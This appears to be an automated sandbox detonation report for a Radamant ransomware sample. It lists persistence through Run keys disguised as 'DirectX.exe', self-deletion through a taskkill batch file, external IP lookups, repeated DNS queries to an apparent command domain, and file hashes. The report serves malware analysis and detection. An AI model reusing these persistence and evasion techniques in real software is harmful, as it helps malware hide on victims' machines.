Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\DirectX.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DirectX = "C:\\Users\\Admin\\AppData\\Roaming\\DirectX.exe" C:\Users\Admin\AppData\Roaming\DirectX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DirectX = "C:\\Users\\Admin\\AppData\\Roaming\\DirectX.exe" C:\Users\Admin\AppData\Roaming\DirectX.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe"

C:\Users\Admin\AppData\Roaming\DirectX.exe

"C:\Users\Admin\AppData\Roaming\DirectX.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c aaa.bat

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im DUMP_00A10000-00A1D000.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 checkip.dyndns.org udp
BR 132.226.247.73:80 checkip.dyndns.org tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 73.247.226.132.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 95.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 138.201.86.20.in-addr.arpa udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp
US 8.8.8.8:53 tangotangocash.com udp

Files

memory/2552-0-0x0000000000400000-0x0000000000419000-memory.dmp

C:\Users\Admin\AppData\Roaming\DirectX.exe

MD5 6152709e741c4d5a5d793d35817b4c3d
SHA1 05ae9c76f8f85ad2247c06d26a88bbbcfff4d62e
SHA256 2c4c8066a1a7dfdf42c57ff4f9016f1ba05bcb004ff8b0ffc0989165d2ad30e2
SHA512 1e5ebd53ac942b0f06f759f936efebeeb9a74062647cd978d5112720f772f607b12ee20c02ab838104a7a947fef2fde79b0db944286d8daf2e6e6d16e10b9390

memory/1888-61-0x0000000000400000-0x0000000000419000-memory.dmp

memory/2552-65-0x0000000000400000-0x0000000000419000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\aaa.bat

MD5 2861e1b3a96bd68affe71c9c07142aae
SHA1 13cdf1d8667309b8e92e630c6026f1bc94b40845
SHA256 62a90c33cd71d3ecc13d6d002d1797e37042791819d1d24d3acbba53a4e834bb
SHA512 8f86a6f09e0a587cd533b1c3400d26196f7738972add27cbd34712eb85dc019f4c99f8406f1edbee8e31ed263fc7cd5f0c3fde7aa260a1c5ac820b00a7b117e8

memory/1888-67-0x0000000000400000-0x0000000000419000-memory.dmp

memory/1888-86-0x0000000000400000-0x0000000000419000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240611-en

Max time kernel

810s

Max time network

1217s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\DirectX.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DirectX = "C:\\Users\\Admin\\AppData\\Roaming\\DirectX.exe" C:\Users\Admin\AppData\Roaming\DirectX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Windows\CurrentVersion\Run\DirectX = "C:\\Users\\Admin\\AppData\\Roaming\\DirectX.exe" C:\Users\Admin\AppData\Roaming\DirectX.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2120 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe C:\Users\Admin\AppData\Roaming\DirectX.exe
PID 2120 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe C:\Users\Admin\AppData\Roaming\DirectX.exe
PID 2120 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe C:\Users\Admin\AppData\Roaming\DirectX.exe
PID 2120 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe C:\Users\Admin\AppData\Roaming\DirectX.exe
PID 2120 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3036 wrote to memory of 2856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3036 wrote to memory of 2856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3036 wrote to memory of 2856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe"

C:\Users\Admin\AppData\Roaming\DirectX.exe

"C:\Users\Admin\AppData\Roaming\DirectX.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c aaa.bat

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im DUMP_00A10000-00A1D000.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 checkip.dyndns.org udp
US 193.122.130.0:80 checkip.dyndns.org tcp
US 8.8.8.8:53 tangotangocash.com udp

Files

memory/2120-0-0x0000000000400000-0x0000000000419000-memory.dmp

\Users\Admin\AppData\Roaming\DirectX.exe

MD5 6152709e741c4d5a5d793d35817b4c3d
SHA1 05ae9c76f8f85ad2247c06d26a88bbbcfff4d62e
SHA256 2c4c8066a1a7dfdf42c57ff4f9016f1ba05bcb004ff8b0ffc0989165d2ad30e2
SHA512 1e5ebd53ac942b0f06f759f936efebeeb9a74062647cd978d5112720f772f607b12ee20c02ab838104a7a947fef2fde79b0db944286d8daf2e6e6d16e10b9390

memory/2120-11-0x0000000003C60000-0x0000000003C79000-memory.dmp

memory/2800-12-0x0000000000400000-0x0000000000419000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\aaa.bat

MD5 2861e1b3a96bd68affe71c9c07142aae
SHA1 13cdf1d8667309b8e92e630c6026f1bc94b40845
SHA256 62a90c33cd71d3ecc13d6d002d1797e37042791819d1d24d3acbba53a4e834bb
SHA512 8f86a6f09e0a587cd533b1c3400d26196f7738972add27cbd34712eb85dc019f4c99f8406f1edbee8e31ed263fc7cd5f0c3fde7aa260a1c5ac820b00a7b117e8

memory/2120-22-0x0000000000400000-0x0000000000419000-memory.dmp

memory/2800-24-0x0000000000400000-0x0000000000419000-memory.dmp